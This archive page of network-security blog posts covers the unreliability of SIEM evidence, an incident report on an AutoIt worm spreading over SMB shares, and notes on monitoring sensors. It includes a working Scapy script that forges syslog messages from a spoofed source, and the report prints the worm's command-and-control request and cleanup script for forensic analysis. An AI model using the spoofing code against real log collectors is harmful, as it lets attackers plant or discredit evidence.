Archive for the Why watch the wire? Category

Si(EM)lent Witness

Posted in General Security, Why watch the wire? on 23 June, 2010 by Alec Waters

Obligatory disclaimer: I Am Not A Lawyer. “Evidentiary weight” is probably something that involves a set of scales.

Evidence of an electronic crime is most commonly retrieved through a well-established process of computer forensics. Regardless of the actual examination techniques used, the evidence (a seized hard drive, for example) has to be handled in such a way that its integrity is preserved, usually by way of examining a forensic duplicate of the media and leaving the original in the evidence safe.

It’s a little different when practising network forensics:

  • You have to be routinely collecting the evidence before the mischief is perpetrated. Network-based evidence is fleeting in nature – once it’s gone, it’s gone – if you’re not recording something all the time, when the mischief happens you’ll miss it.
  • There isn’t such a firm concept of “original” or “best” evidence as there is in the computer forensics world. Packet captures are a copy of the original traffic, collected syslog messages are copies of log messages from a device, and netflow exports are descriptions of an act rather than the act itself. None of the copies are “forensically sound” like a disk image can be considered to be; they all sound rather like second-hand accounts.

A handy thing to do with all this evidence is to collect it, usually with some kind of SIEM or Log Management device, and vendors of such devices go to lengths to preserve the integrity of the collected data to maximise its weight as evidence. For example, a Cisco CS-MARS box stores everything in an internal Oracle database to which the user has no direct access; the idea is to give some assurance that the collected logs haven’t been tampered with. Other vendors like AlienVault say that their product “Forensically store(s) data (admissible in court)”. Given the potentially second-hand nature of our evidence, these anti-tamper measures are surely a good thing.

However, how can we convince someone that the evidence we are presenting is a true and accurate account of a given event, especially in the case where there is little or no evidence from other sources? Perhaps a laptop’s hard drive has been shredded, and the only evidence we’ve got is from our SIEM/LM box. Our evidence may be considered unreliable, since:

  • It could be incomplete:
    • A packet capture may not have captured everything – dropped packets are commonplace.
    • UDP-based message transfer (syslog, netflow, SNMP trap, etc.) is best-effort delivery. Dropped messages will not be retransmitted, and most likely a gap in the sequence will not even be noticed.
    • We may have exceeded our SIEM’s events per second threshold, and the box itself may have discarded crucial evidence.
  • The body of evidence within our SIEM could have been tampered with.

But didn’t I say that vendors went to great lengths to prevent tampering? They do, but these measures only protect information that is already on the device. What if I can contaminate the evidence before it’s under the SIEM’s protection?

The bulk of the information received by an SIEM box comes over UDP, so it’s reasonably easy to spoof a sender’s IP address; this is usually the sole means at the SIEM’s disposal to determine the origin of the message. Also, the messages themselves (syslog, SNMP trap, netflow, etc.) have very little provenance – there’s little or no sender authentication or integrity checking.

Both of these mean it’s comparatively straightforward for an attacker to send, for example, a syslog message that appears to have come from a legitimate server when it’s actually come from somewhere else.

In short, we can’t be certain where the messages came from or that their content is genuine.
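
To make this concrete, here’s a rough sketch (my own illustration using Python and Scapy, not a recipe taken from any real incident) of how little it takes to hand a SIEM a syslog message that claims to come from a trusted server. All of the addresses are documentation examples and the forged log line is invented:

    from scapy.all import IP, UDP, Raw, send

    # Forge a syslog datagram whose source IP claims to be a legitimate server.
    # 192.0.2.10 plays the "trusted fileserver", 192.0.2.250 the SIEM collector.
    fake_log = (b"<38>Jun 23 08:00:00 fileserver sshd[4321]: "
                b"Accepted password for admin from 203.0.113.7 port 51515 ssh2")

    pkt = (IP(src="192.0.2.10", dst="192.0.2.250")
           / UDP(sport=514, dport=514)
           / Raw(load=fake_log))

    send(pkt, verbose=False)   # needs raw socket privileges (i.e. root)

Unless the collector is doing something out of the ordinary (syslog over TLS, signed messages, strict ingress filtering), it has no real way of telling this apart from the genuine article.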

So what could an attacker achieve by injecting false messages into an SIEM?

  • They could plant false evidence of an act that did not take place – perhaps to get someone fired for downloading questionable material, for example.
  • They could plant “tasty” evidence that the SIEM operators are likely to investigate first, buying the attacker time.
  • They could force the box over its EPS limit so that genuine evidence is discarded.
  • They could inject malformed messages that may lead the SIEM operators to believe that their box is somehow corrupted, and wait until it is offline for maintenance before striking.
  • They could inject events or series of events that “couldn’t happen” to cause the SIEM operators to distrust the accuracy of the system (e.g. a proxy log message indicating a fetch of a webpage with no corresponding netflow export).
  • Or perhaps their aim is to simply discredit the entire pool of evidence by injecting obviously false messages. Yes, an analyst could try to weed out the fake ones, but could they prove that they’d found all of them?
  • <insert your own creative evil here>

If there’s any doubt as to the provenance of a message received by the SIEM, one could always go back to the original source and look for it there. The problem here is that it might not be there any more (due to log rotation on a server) or there may not even be an original to compare it to (a netflow export is the original message, for example).

I’m surely being a bit pessimistic here, but given that there’s a distinct possibility that any given SIEM is chock full of lies, how much evidentiary weight does its content actually possess? Does anyone know of any successfully-prosecuted cases where evidence from an SIEM has been key?


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Private Investigations

Posted in Case Studies, General Security, Malware, NSM, Why watch the wire? on 25 May, 2010 by Alec Waters

The following is a sanitised excerpt from an after action report on a malware infection. Like the song this post is named after, the report goes all the way from “It’s a mystery to me” to “What have you got to take away?”. The report is in two parts:

  • Firstly, a timeline of events that was constructed from the various forms of log and network flow data that are routinely collected. Although not explicitly cited in this report, evidence exists to back up all of the items in the timeline.
  • Secondly, an analysis of the cause of all the mischief.

To set the scene, the mystery to be unraveled concerned two machines on an enterprise network which reported that they had detected and removed malware. Detected and removed? Case closed, surely? Never ones to let a malware detection go uninvestigated, we dig deeper…

Part One – Timeline of events

Unknown time, likely shortly before 08:12:37 BST
Ian Oswald attaches a USB stick to his computer. $AV_VENDOR does nothing, either because it detects no threat or because it isn’t working properly. The last message from $AV_VENDOR on Ian’s machine to $AV_MANAGEMENT_SERVER was on 30th January 2009, suggesting the latter is the case.

Based upon subsequent activity, malware is active on Ian’s machine at this point, and is running under his Windows account as a Domain Administrator. The potential for mischief is therefore largely unconstrained.

08:12:37 BST
Ian’s machine ($ATTACKER) requests the URL:

http://www.whatismyip.com/automation/n09230945.asp

This returns a page containing the outside global IP address of Ian’s machine (i.e., the IP address it will appear to have when communicating with hosts on the Internet).

Something on Ian’s machine now knows “where it is” on the Internet.

It is likely that the inside local IP address of Ian’s machine (192.168.1.11) is also determined at this point, so something on Ian’s machine also knows “where it is” within the enterprise.
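
As an aside, neither determination requires anything exotic. Here’s a minimal sketch of the same two steps (the IP-echo service named below is just a present-day stand-in for the whatismyip.com automation page, and the UDP-connect trick sends no actual traffic):

    import socket
    import urllib.request

    # "Where am I?" on the Internet: ask a service that echoes the caller's
    # public (outside global) address. api.ipify.org is a stand-in example.
    outside = urllib.request.urlopen("https://api.ipify.org").read().decode().strip()

    # "Where am I?" within the enterprise: connecting a UDP socket to any
    # external address reveals which local (inside local) address would be used.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(("192.0.2.1", 80))     # no packet is sent for a UDP connect
    inside = s.getsockname()[0]
    s.close()

    print("outside global:", outside)
    print("inside local:  ", inside)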

08:12:39 BST
Ian’s machine requests the URL:

http://geoloc.daiguo.com/?self

This is a geolocation site, and returns a string containing a country code.

Something on Ian’s machine now knows “where it is” geographically.

08:12:56 BST
Ian’s machine attempts to download a hostile executable. This download is blocked by $URLFILTER, which is fortunate because at the time the executable was not detected as a threat by $AV_VENDOR.

NOTE – Subsequent analysis of the executable confirms its hostile nature; detailed discussion is out of the scope of this report, but a command and control channel was observed, and steganographic techniques were used to conceal the download of further malware by hiding an obfuscated executable in the Comment Extension block of a GIF file.
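
For the curious, the GIF Comment Extension is a simple hiding place: it’s introduced by the bytes 0x21 0xFE and carries its payload in length-prefixed sub-blocks. Below is a minimal sketch of pulling that data out (my own illustration, not the tooling used during the investigation, and a naive byte scan rather than a full GIF parser):

    def gif_comments(path):
        """Return the raw payloads of any Comment Extension blocks in a GIF."""
        data = open(path, "rb").read()
        comments, i = [], 0
        while True:
            i = data.find(b"\x21\xfe", i)       # extension introducer + comment label
            if i == -1:
                break
            i += 2
            payload = bytearray()
            while i < len(data) and data[i] != 0x00:
                length = data[i]                # each sub-block: length byte, then data
                payload += data[i + 1:i + 1 + length]
                i += 1 + length
            comments.append(bytes(payload))
            i += 1                              # step over the 0x00 block terminator
        return comments

    for c in gif_comments("suspect.gif"):
        print(f"{len(c)} bytes of comment data recovered")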

NOTE – It was not known until later in the investigation if Ian’s machine already knew where to download the executable from, or if a command and control channel was involved. Ian’s machine was running Skype at the time, which produces sufficient network noise to occlude such a channel when only network session information is available to the investigator.

After this attempted download, Ian’s machine starts trying to contact TCP ports 139 and 445 on IP addresses that are based on the determined outside global address of Ian’s machine (xxx.yyy.49.253).

TCP139 and TCP445 are used by the SMB protocol (Windows file sharing).

The scan starts with IP address xxx.yyy.49.1 and increments sequentially. As the day progresses, the scan of xxx.yyy.49.aaa finishes and moves on to xxx.yyy.50.aaa and then xxx.yyy.51.aaa.

This is the behaviour of a worm. Something on Ian’s machine is trying to propagate to other machines nearby.

08:13:14 BST
Ian notices a process called ip.exe running in a command prompt window on his computer and physically disconnects the machine from the network. This action was taken a very creditable 41 seconds after the first suspicious network activity.

Ian attempts to stop ip.exe running and remove it from his machine, and also deletes a file called gxcinr.exe from his USB stick.

08:24:51 BST
Ian reattaches his machine to the network.

08:25:36 BST
Ian uses Google to research ip.exe, and reads a blog posting which talks about its removal. Ian considers his machine clean at this point since the most obvious indicator (ip.exe) is no longer present.

08:57:32 BST
The external sequential SMB scanning observed before the attempted cleanup restarts at xxx.yyy.49.1.

Additionally, an internal scan commences at this point of the 192.168.1.aaa subnet (i.e., the enterprise’s internal network).

As the day progresses, the scan covers 192.168.2.aaa, 192.168.3.aaa, 192.168.4.aaa, 192.168.5.aaa, 192.168.6.aaa, 192.168.7.aaa and 192.168.8.aaa before Ian’s machine is switched off for the day. These latter subnets are not in use, so no connections were made to target systems.

The scan of 192.168.1.aaa is bound to bear fruit. Within this range, any detected SMB shares on enterprise computers will be accessed with the rights of a Domain Administrator.

08:58:43 BST
$AV_VENDOR detects and quarantines a threat named “W32/Autorun.worm.zf.gen” on $VICTIM_WORKSTATION_1 (Annie Timms’ machine). The threat was in a file called gxcinr.exe, which was in C:\Users\ on Annie’s machine. $AV_VENDOR cites $ATTACKER (Ian’s machine) as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

09:00:08 BST
$AV_VENDOR detects and quarantines the same threat in the same file in the same location on $VICTIM_WORKSTATION_2. Linda Charles was determined to be the logged on user at the time, and again Ian’s machine was cited as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

09:34:45 BST
$AV_VENDOR on $VICTIM_SERVER_1 detects the same threat in the same file, but in a different directory (C:\Program Files\Some software v1.1\). The threat was quarantined. No threat source was noted, although a successful type 3 (network) login from Ian.Oswald was noted immediately prior to the detection, making Ian’s machine the likely attacker. Unfortunately, the detection was _not_ propagated to $AV_MANAGEMENT_SERVER, and therefore did not find its way to the $SIEM to be sent as an email.

09:37:51 BST
The same threat was detected and quarantined on $VICTIM_SERVER_2, this time in E:\Testbeds\TestOne\. Again, a type 3 login from Ian.Oswald precedes the detection, which again was not propagated to $AV_MANAGEMENT_SERVER, $SIEM or email.

09:40:00 BST
The same threat appears on $VICTIM_SERVER_3, in C:\Program Files\SomeOtherSoftware. The threat is not detected because $AV_VENDOR is not fully installed on this machine.

NOTE – Detection of gxcinr.exe on this machine was by manual means, after the malware’s propagation mechanism was deduced (see next entry). $AV_VENDOR was subsequently installed on $VICTIM_SERVER_3 and a full scan performed. For what it’s worth, this did not detect any threats.

09:46:05 BST -> 09:54:44 BST
The border $IPS sensor detected Ian’s machine connecting to and enumerating SMB shares on three machines on $ISP’s network (i.e., other $ISP customers external to the enterprise).

This clue helps us see how the malware is spreading, and why the threats were detected in the cited directories.

The malware conducts a sequential scan of IP addresses, looking for open SMB ports. If it finds one, it enumerates the shares present, picks the first one only, and copies the threat (gxcinr.exe) to that location (i.e., \\VICTIMMACHINE\FirstShare\gxcinr.exe):

  • C:\Program Files\Some software v1.1\ equates to the first share on $VICTIM_SERVER_1 – \\$VICTIM_SERVER_1\Software
  • E:\Testbeds\TestOne\ equates to the first share on $VICTIM_SERVER_2 – \\$VICTIM_SERVER_2\TestOne
  • C:\Users equates to the first share on Annie’s and Linda’s machine – \\$VICTIM_WORKSTATION_1\Users and \\$VICTIM_WORKSTATION_2\Users
  • C:\Program Files\SomeOtherSoftware equates to the first share on $VICTIM_SERVER_3 – \\$VICTIM_SERVER_3\SomeOtherSoftware

This knowledge allows us to manually check other machines on the enterprise network by performing the same steps as the malware. Other machines and devices were found to have open file shares, but either the shares were not writeable from a Domain Administrator’s account, or there was no trace of the threat (gxcinr.exe).
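
For reference, the manual check simply repeated the malware’s own steps: enumerate a host’s shares, take the first one, and look for gxcinr.exe in it. Here is a rough sketch of that sweep, assuming a Windows analysis box and English-language "net view" output (both assumptions on my part):

    import os
    import subprocess

    def first_share(host):
        """Return the first disk share advertised by 'net view \\\\host', if any."""
        out = subprocess.run(["net", "view", f"\\\\{host}"],
                             capture_output=True, text=True).stdout
        for line in out.splitlines():
            parts = line.split()
            if len(parts) >= 2 and parts[1] == "Disk":   # crude parse; share names with spaces will confuse it
                return parts[0]
        return None

    for host in open("hosts.txt"):                       # one hostname or IP per line
        host = host.strip()
        share = first_share(host)
        if share and os.path.exists(rf"\\{host}\{share}\gxcinr.exe"):
            print(f"possible infection: \\\\{host}\\{share}")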

Circa 14:00 BST
Ian turns his machine off and leaves the office until the following Monday.

The following Monday
Ian returns to the office and wipes his machine, installing Windows 7 in place of the previous Windows Vista. “Patient Zero” is therefore gone forever, and any understanding we could have extracted from it is lost.

END OF TIMELINE

Part Two – Analysis of gxcinr.exe

It is necessary to understand what this file is, what it does, and how it persists in order to know if we have eradicated the threat. We also need to understand if gxcinr.exe was responsible for the propagation from Ian’s machine, or if it was just the payload.

Samples of gxcinr.exe were available in five places, namely the unprotected $VICTIM_SERVER_3 server and in the quarantine folders of the four machines where $AV_VENDOR detected the threat. We reverse-engineered the quarantine file format used by $AV_VENDOR and extracted the quarantined threats for comparison.
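
As an aside, “reverse-engineering the quarantine format” is often less glamorous than it sounds: many AV products do little more than XOR the original file with a fixed single-byte key. A minimal sketch of that style of recovery (the brute-force approach and the filename are illustrative assumptions, not the actual $AV_VENDOR format):

    def xor_decode(data: bytes, key: int) -> bytes:
        return bytes(b ^ key for b in data)

    with open("quarantine.bup", "rb") as f:       # illustrative filename
        blob = f.read()

    # Try every single-byte key and keep any result that starts with an 'MZ'
    # executable header. Real quarantine containers often wrap the payload in
    # extra structure, so offsets may need adjusting.
    for key in range(256):
        candidate = xor_decode(blob, key)
        if candidate.startswith(b"MZ"):
            with open(f"decoded_{key:02x}.bin", "wb") as out:
                out.write(candidate)
            print(f"key 0x{key:02x} produced an MZ header")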

On $VICTIM_SERVER_3, the MAC times for gxcinr.exe were as follows:

Modified: aa/bb/2009 09:13
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
No file attributes were set.

Additionally, a zero-byte file called khw was found alongside gxcinr.exe. Its MAC times correlate with those of gxcinr.exe, indicating that it was either propagated along with gxcinr.exe or created by it:

Modified: xx/yy/2010 09:40
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
Attributes: RHSA

khw was also found on Linda Charles’s machine, and removed manually. No other machines had khw on them.

All five samples of gxcinr.exe were found to be identical:

File size: 808164 bytes

Hashes:
MD5 : 2511bcae3bf729d2417635cb384e3c08
SHA1 : 45fe02e4489110723c2787f3975ae7122b905400
SHA256: b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3

VirusTotal report is here:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1272966302

The AV detection rate is pretty good, although we were the first people to submit this specific malware sample to VirusTotal for analysis (i.e., it’s a reasonably fresh variant of a malware strain).

Whilst it’s not safe to judge the nature of malware by AV vendors’ descriptions alone, most of the descriptions have AutoIt in their names. AutoIt is a scripting tool that can be used to produce executables to carry out Windows tasks. Analysis of ASCII and Unicode strings contained in the sample lends weight to this theory.

AutoIt has an executable-to-script feature, but this was unable to extract the compiled script. Research suggests that this feature has been removed from recent versions of the software as a security precaution.

The sample contains the string below, amongst many other intelligible artefacts:

“This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.”

We emailed the address above asking for help, but received no response.

The next step was to carry out dynamic analysis of the sample (i.e., the executable was run in an instrumented and controlled environment and the results observed).

When run, gxcinr.exe did very little. There was no geolocation, no IP address determination, no instance of ip.exe, no scanning, and no second-stage download.

However, gxcinr.exe was found to create, and later attempt to remove, three temporary files:

  1. aut1F.tmp (random filename, judging by repeated runs) is binary; the first four bytes are the ASCII string EA06 (http://www.virustotal.com/analisis/b3508b5a86ca4b9d972ce46dd4dcc1dcbe528a24190d2ed10a3cfcf8038c8ecd-1273577387). There is no obvious decode or deobfuscation.
  2. jbmphni (random filename, judging by repeated runs) is ASCII and starts off “3939i33t33i33t3135i33t…..”. There are many repeating patterns in the file, some of which are several tens of characters long (http://www.virustotal.com/analisis/0ad63912039550b5bdfd8a08ce5f49997ed1fced070df4d8e51cbffa500f102d-1273577394). Again, there is no obvious decode or deobfuscation.
  3. s.cmd is a cleanup script, run by gxcinr.exe after it has deleted the two files above:

    :loop
    del "C:\gxcinr.exe"
    if exist "C:\gxcinr.exe" goto loop
    del c:\s.cmd

Running the sample in this manner yielded no obvious activity, infection, propagation or persistence.

However, if the file khw is present in the same directory as gxcinr.exe, different behaviour is observed. The three files above are extracted, the cleanup above is observed, but also:

  • A slightly modified version of the sample is copied to c:\windows\system32 as csrcs.exe. The name of the file is a deliberate attempt to hide in plain sight – there is a legitimate Windows file called csrss.exe. Additionally, the file’s create and modified times are artificially set to match the date that Windows was installed. VirusTotal says this of csrcs.exe:
    http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274359325
  • No attempt is made to hide csrcs.exe from detection, nor does it delete its prefetch file. No matching prefetch files were found on the machines belonging to Annie and Linda, so it is unlikely that the malware executed there. Prefetch is disabled by default on Windows Server 2003, so this kind of analysis cannot be performed on $VICTIM_SERVER_1, $VICTIM_SERVER_2, and $VICTIM_SERVER_3.
  • csrcs.exe is set to auto-run with each reboot by means of various registry keys.
  • csrcs.exe contacts a command and control server at IP address qqq.www.eee.rrr on varying ports in the 81-89 range. The request was HTTP, and looked like this:

    GET /xny.htm HTTP/1.1
    Host: http://www.hostile.com:85
    Cache-Control: no-cache

    The response is encoded somehow:

    HTTP/1.1 200 Ok
    Content-Length: 2811
    Last-modified: xxx, xx xxx 2010 11:13:30 GMT
    Content-Type: text/html
    Connection: Keep-Alive
    Server: SHS

    <zZ45sAsM8Y77V69S888S6 … snip … 80ew0kty0j4tyj004>

    There is no obvious decode of the response, but we are likely receiving instructions of some kind. Looking retrospectively at the evidence secured at the time, we can see Ian’s machine contacting this IP address:

    08:12:39.048 BST: %IPNAT-6-CREATED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    08:12:41 BST Cisco Netflow : bytes: 289 , packets: 5 , 192.168.1.11 /50345 -> qqq.www.eee.rrr /85 ­ TCP

    08:13:39.393 BST: %IPNAT-6-DELETED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    This C&C channel was not readily obvious due to the presence of Skype on Ian’s machine – there were too many other connections to random IP addresses on random ports for this to stand out.

    Despite the fact this suspected C&C channel uses unencrypted HTTP, only nominated ports are inspected via $URLFILTER (port 80 is inspected as the default, plus other ports where we have seen HTTP running in the past). At the time, 85 was not one of the nominated ports so no inspection of this traffic was carried out. Had port 85 been in the list, $URLFILTER would have blocked the request, as the destination is categorised as Malicious. It is unknown if this step would have prevented the worm from spreading, but it would have at least been another definite indicator of malice.

  • csrcs.exe then gets its external IP address and geolocation in the manner observed from Ian’s machine
  • csrcs.exe then starts scanning in the manner observed from Ian’s machine
  • csrcs.exe infects other machines in the manner observed from Ian’s machine

In our tests, csrcs.exe created a file on each remote victim machine called owadzw.exe, and put the file khw alongside it (suggesting that gxcinr.exe is a randomly generated filename). We did not observe any attempt to execute owadzw.exe, nor were any registry keys modified. The malware appears to spread, but seems to rely on manual execution when the remote file share is on a fixed disk.

However, if the file share that is accessed is removable media (USB stick, camera, MP3 player or whatever), an autorun.inf file is created that will execute the malware when the stick is inserted in another computer. It is likely therefore that Ian’s USB stick was infected in this manner, and the malware was unleashed on the enterprise by virtue of him plugging it in.
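
A quick way to hunt for this propagation path is to look at the root of every attached drive for an autorun.inf that launches an executable. The sketch below is illustrative only (section and key names vary between worms, and hostile autorun.inf files are frequently malformed on purpose):

    import configparser
    import os
    import string

    # Check each drive root for an autorun.inf whose 'open' or 'shellexecute'
    # entry points at something executable. Run on a Windows analysis machine.
    for letter in string.ascii_uppercase:
        inf = f"{letter}:\\autorun.inf"
        if not os.path.exists(inf):
            continue
        cp = configparser.ConfigParser()
        try:
            cp.read(inf)
        except (configparser.Error, UnicodeDecodeError):
            print(f"{inf}: unparsable (suspicious in itself)")
            continue
        for section in cp.sections():             # usually [autorun], but case varies
            for key in ("open", "shellexecute"):
                if cp.has_option(section, key):
                    print(f"{inf}: [{section}] {key} = {cp.get(section, key)}")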

The VirusTotal result for owadzw.exe is similar to the results for gxcinr.exe and csrcs.exe, so they are all likely to be slight variations of one another:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274356524

We did not observe csrcs.exe trying to download any other executables, as was the case with Ian’s machine, nor did we observe ip.exe running on an infected machine.

Aside from spreading, the purpose of the malware is unknown. However, it is persistent (i.e., it will run every time you start your machine) and it does appear to have a command and control facility. It is entirely possible that at some later date it will ask for instructions and be told to carry out some other kind of activity (spamming, DoS, etc.) or it may download additional components (keyloggers, for example).

Where do we stand?

We understand the malware’s behaviour, and know how to look for indicators of it running both in terms of network activity and residual traces on the infected host. At present there are none, so we appear to be clean.
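
By way of illustration, the host-side part of that check can be scripted. This is a rough sketch only: the report says csrcs.exe auto-runs via “various registry keys” without listing them, so the Run keys below are an assumption, as is the file path:

    import os
    import winreg

    indicators = []

    # Residual file dropped by the malware (assumed location).
    if os.path.exists(r"C:\Windows\System32\csrcs.exe"):
        indicators.append(r"file present: C:\Windows\System32\csrcs.exe")

    # Autorun entries referencing csrcs.exe in the usual Run keys (assumed).
    for hive, hive_name in ((winreg.HKEY_LOCAL_MACHINE, "HKLM"),
                            (winreg.HKEY_CURRENT_USER, "HKCU")):
        try:
            key = winreg.OpenKey(hive, r"Software\Microsoft\Windows\CurrentVersion\Run")
        except OSError:
            continue
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            if "csrcs" in str(value).lower():
                indicators.append(f"{hive_name} Run value '{name}' -> {value}")
            index += 1

    print("\n".join(indicators) if indicators else "no indicators found")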

What went right?

  • An incident was triggered by virtue of an explicit indicator of malice (the $AV_VENDOR alerts from Annie’s and Linda’s machines).
  • Where functioning properly, $AV_VENDOR prevented the spread of the malware.
  • $URLFILTER blocked a malicious download.
  • We were able to preserve and analyse sufficient evidence in the total absence of Patient Zero (Ian’s machine) for us to understand how the malware spreads. This let us carry out a comprehensive search for any other, undetected, infections (like the one on $VICTIM_SERVER_3).
  • We were able to recover a sample of the malware and analyse it to the extent that we can say with a good degree of confidence that it was present on Ian’s USB stick, and was responsible for the whole incident (as opposed to merely being the payload for some other unknown malware that had been running on Ian’s machine for an unknown period of time).
  • We were able to sharpen our detection of the malware, now that we know how it behaves.

What went wrong?

  • The infection was not stopped at its point of entry (Ian’s machine), most likely because $AV_VENDOR wasn’t working properly.
  • The malware executed as a Domain Administrator, effectively removing any limit on the damage it could have caused.
  • The malware spread outside of the enterprise and infected other machines.
  • The malware infected an enterprise machine unprotected by $AV_VENDOR.
  • $VICTIM_SERVER_1 and $VICTIM_SERVER_2 did not report their infection to $AV_MANAGEMENT_SERVER. These detections were only discovered as part of the evidence preservation process.
  • $URLFILTER did not block the C&C channel due to the way it was configured.
  • The $IPS didn’t fire any “scanner” signatures.
  • No statistical alarms were raised by the $SIEM.

What can be changed or done better?

  • A review of the state of the $AV_VENDOR deployment should be carried out. We need to know what the coverage is like, how well the updates are working, and why certain machines don’t report to $AV_MANAGEMENT_SERVER.
  • Some form of USB device control should be implemented.
  • People with Administrative rights on the enterprise network should have two accounts, one “Admin” account and one “Normal” account. The Normal account should be used day-to-day, with the Admin account used only where necessary. This would put a cap on the capability of any malware that is able to run.
  • Unnecessary fileshares should be removed. It was determined experimentally that if you share anything within any user profile on a Vista or Win7 machine, the entire c:\users\ directory gets shared. This was the case on Annie’s and Linda’s machines.
  • The presence of Skype doesn’t help when dealing with an incident like this.
  • If a tighter outbound port filtering policy had been applied, the command and control channel would have been blocked, as would the worm’s attempts to propagate outside of the enterprise.

END OF REPORT

The production of this report would not have been possible without the routine collection of evidence from everything-you-can-lay-your-hands-on – servers, routers, switches, AV servers, URL filters and IPS devices all contributed to the report (notable things that did not contribute to the report are Ian’s machine and his USB stick, since they were wiped before they could play a part).

Without these event sources, all we’d have had were two reports of removed malware. Hardly cause for alarm, surely….


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Securitas Vigilantiae Instantis Praemium

Posted in General Security, NSM, Why watch the wire? on 28 October, 2009 by Alec Waters

The inner title page of MI5’s authorised history shows one of the Service’s past logos, bearing the motto: “Securitas Vigilantiae Instantis Praemium”, intended to mean “Security is the reward of unceasing vigilance”. This seems to me to be as good a motto now as it was seventy years ago.

An enterprise has numerous tools at its disposal to control what happens on its infrastructure. Some examples are technical controls (such as port filtering, or blocking access to certain types of website) and non-technical controls (such as Acceptable Use Policies, violation of which could lead to disciplinary action).

Controls like these describe what you hope should be happening on your network, which isn’t necessarily what is happening. Controls may have been:

  • Intended, but not actually implemented at all
  • Improperly implemented
  • Removed
  • Changed
  • Circumvented (intentionally or otherwise)
  • Or they may not be as effective as you’d have hoped (anti-virus is a good example).

Implementing a control and then leaving it to its own devices doesn’t seem like a viable tactic. Rather than simply believing a control to be effective, we need to make sure it is effective, through the collection of information and the (unceasing) vigilance required to extract the greatest meaning from it.

By doing this, you can verify the effectiveness of your controls. When things go wrong, you can use what you’ve collected to help you understand what happened and how you can modify your controls to help prevent it from happening again.

Without vigilance, we have our head in the sand, hoping for the best. If our vigilance is not unceasing, Murphy’s Law dictates that something Bad will happen the moment we take our eye off the ball.

“Securitas Vigilantiae Instantis Praemium” hardly ranks as catchy, but it certainly hits the nail on the head. Well, one of the nails, anyway.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Quis custodiet ipsos facis?

Posted in Why watch the wire? on 15 May, 2009 by Alec Waters

According to the Magic Internet, that means “who watches the packets?” I bet my Latin teacher would have a few comments on that translation…

Anyway, we’ve decided that we’re interested in the network traffic crossing the point between our switch and our small-office router. We have made this decision because we do not wish to trust our security solely to preventative measures which will inevitably let us down. We want to try to spot the Badness getting in and out, and this is the way to do it.

The practicalities of this are twofold – we need a sensor with which to collect the traffic, and we need some way of directing our traffic to it so that it can be examined.

For the most part, the sensor is some kind of computer with at least one network interface of a type appropriate to your infrastructure (e.g., perhaps it’s an ordinary copper ethernet interface, or a fibre-optic interface, or even a wifi one). The sensor will not interfere with the collected traffic in any way, as it will usually be fed a copy of the traffic you want to inspect. This prevents the mere presence or absence of the sensor from breaking any of your stuff, and also has the happy side effect of preventing the Baddies from even knowing you’ve deployed it.

There are a number of ways we can get a copy of our network traffic to our sensor:

  • If our switch is capable of it, we can configure a SPAN port that outputs a copy of everything sent and received on the switchport connecting to our router. By plugging our sensor into this SPAN port, it will be able to see all of our Internet traffic.
  • If our sensor has two or more monitoring interfaces, we can use a network tap. A tap will physically sit on the path between our switch and our router, and will “syphon off” a copy of the network traffic for our sensor to look at. Although the tap is inline, it doesn’t alter the observed traffic and it won’t permit the sensor to inject any traffic of its own. It’s the purest form of capture, and can be dropped in without altering the configuration of any other devices. Tap manufacturer Netoptics has a comparison between tap and SPAN here.
  • A final option might be something like Cisco’s Raw IP Traffic Export (RITE). This is something of a last choice, though; generally speaking tap and SPAN are superior options. However, for some topologies this may be the only option – you may not be physically able to use tap or SPAN if you want to capture the traffic crossing a virtual IP interface on a layer three switch, for example.

For the sake of simplicity, let’s say our sensor has just one monitoring interface and we’re feeding it from a SPAN port on our office’s switch. We are now ready to spot the Badness! However, our sensor needs to be able to do something with the traffic we’re spewing at it. We need to be able to receive it, store it, inspect it, mine it.
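
To give a flavour of the “receive and store” part, here’s a minimal sketch (assuming a sensor running Python and Scapy, with the monitoring interface named eth1; both are my assumptions, and a production sensor would use a dedicated capture tool with file rotation rather than a fixed packet count):

    from scapy.all import sniff, wrpcap

    # Capture whatever the SPAN port feeds us on the monitoring interface and
    # write it to disk for later inspection and mining.
    packets = sniff(iface="eth1", count=1000)   # stop after 1000 packets for this demo
    wrpcap("office-border.pcap", packets)
    print(f"wrote {len(packets)} packets to office-border.pcap")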

Hold tight – things are about to get interesting!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Baby steps, part two

Posted in Why watch the wire? on 12 May, 2009 by Alec Waters

Baby Steps ended by asking how we can use the network itself “to extract information from strategic points that will tell us what is going on”. To start to explain, let’s have an example of a “strategic point”.

When I was at junior school (at about ten years of age), we were given a practical maths assignment which meant us leaving the school grounds. This was a big deal, because our school was quite literally a fortress – it had fifteen foot high brick and flint walls topped off with another six feet of chickenwire, only interrupted by heavy iron gates. Don’t get me started about the guard towers and searchlights. As such, it was a rare treat to get outside during school hours without resorting to re-enacting the Great Escape.

Our maths task for the day was to conduct a traffic survey. We were to sit with our backs to the outside of the fortress wall, count the passing cars, and group them by colour. After twenty minutes or so of this, we were shepherded inside by the guards (sorry, teachers) to prepare a report on which colours of car were most popular based upon our observations.

